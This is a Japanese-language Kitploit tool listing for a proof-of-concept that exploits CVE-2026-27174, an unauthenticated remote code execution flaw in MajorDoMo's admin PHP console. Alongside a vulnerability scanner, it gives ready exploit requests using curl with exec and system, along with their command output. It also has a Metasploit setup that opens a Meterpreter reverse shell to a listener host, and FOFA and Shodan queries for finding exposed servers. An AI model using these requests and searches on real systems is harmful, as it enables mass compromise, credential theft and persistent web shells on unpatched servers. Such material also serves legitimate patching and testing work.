Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - 管理者パネルのPHPコンソール機能を介した未認証のリモートコード実行 | Kitploit
ツール/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - 管理者パネルのPHPコンソール機能を介した未認証のリモートコード実行

リポジトリを見る
36ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

majordomo-CVE-2026-27174-poc

MajorDomo(Major Domestic Module)の管理パネルのPHPコンソール機能を介した、認証なしのリモートコード実行(RCE)を悪用する概念実証(PoC)です。

脆弱性

MajorDoMoの管理パネルは、/admin.php を介してPHP評価コンソールを公開しています。panel.class.php の認証リダイレクト後に exit が欠落しているため、AJAXハンドラ inc_panel_ajax.php が無条件にインクルードされ、その eval() は認証されていない任意のHTTPリクエストから到達可能になります。

攻撃者は、認証情報、事前アクセス、被害者の操作を一切必要とせずに、単一のGETリクエストで任意のPHPコードを実行できます。

影響を受けるバージョン

  • 2026年2月18日のパッチより前のすべてのMajorDomoバージョン。

検出スキャナ

scan.py は、有害なペイロードを一切実行せずに CVE-2026-27174 に脆弱なホストを検出する、非破壊的なマルチスレッドスキャナです。

動作原理

スキャナはターゲットごとに、次の3つのフェーズを順に実行します:

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

キャッシュ、WAF、レスポンスの汚染による誤検知を防ぐため、リクエストごとにランダムな英数字マーカーが生成されます。

使用方法

前提条件

root@kitploit:~
pip install requests

1. ターゲットファイルを準備する

1行に1つの IP:PORT を記述した targets.txt ファイルを作成します:

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. スキャナを実行する

root@kitploit:~
python3 scan.py targets.txt

出力

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

脆弱なホストが1つ以上見つかった場合に自動生成されます:

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]
フィールド説明
targetスキャンした IP:PORT
urlRCE が確認された完全なURL
rce_phpPHPコード実行が確認された(結果では常に true)
disable_functionsサーバーの disable_functions PHP設定(空の場合は null)
system_functions_available攻撃者が呼び出し可能なOS実行関数
impact_levelHIGH(OSコマンド実行が到達可能)または MEDIUM(PHP RCEのみ)

悪用

result.json ファイルの system_functions_available フィールドの結果に基づいて、system 関数を使用して RCE を悪用するGETリクエストを作成できます:

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

自動化

Metasploitモジュール:

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

実戦での使用

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

影響

リモートの認証されていない攻撃者は以下が可能です:

  • サーバー上で任意のPHPコードを実行する
  • 機密ファイルを読み取る(/etc/passwd、設定ファイル、認証情報)
  • 永続的なアクセスを得るためにPHPウェブシェルを作成する
  • PHP関数の system、exec、shell_exec、passthru が無効化されていない場合、OSレベルのコマンド実行に移行する

実際の影響は、サーバーの disable_functions PHP設定によって異なります:

シナリオ影響レベル説明
disable_functions なしCRITICALOSコマンド実行が完全に可能
部分的な制限HIGHPHP RCE + 部分的なOSコマンド実行
disable_functions がすべてのexecをブロックMEDIUMPHP RCEのみ(ファイルの読み書き、データの外部持ち出し)

CVSS 4.0 - 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

修正と緩和策

MajorDomo(Major Domestic Module)の最新バージョンに更新してください。

対策RCEを防止OSコマンド実行を防止
2026年2月18日のパッチ適用✅✅
/admin.php へのファイアウォール/IP許可リスト✅✅
disable_functions の堅牢化❌✅

参考情報

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

免責事項

このツールは、許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。

ツールをダウンロード